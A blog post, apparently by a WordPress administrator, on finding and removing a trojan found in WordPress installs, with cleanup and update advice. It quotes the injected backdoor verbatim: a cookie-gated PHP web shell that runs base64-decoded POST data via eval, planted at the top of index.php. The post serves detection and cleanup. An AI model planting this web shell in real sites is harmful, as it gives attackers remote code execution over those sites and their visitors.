So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed.  When visiting an infected site, most folks are being prompted to download:

Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.

So how do you find out if your install has been hit?  Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php

<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>

If you see that floating around, get rid of it!  Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.

Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:

grep -R 0bdcf3981272c15a /home/user/*

Of course you’ll want to replace “user” with your username and “” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed.  Give that command a few minutes to run and you should get a path of where that code snippet can be found.  All you have to do at that point is purge it and clear any cache you might have on your WP install.

Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.

All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.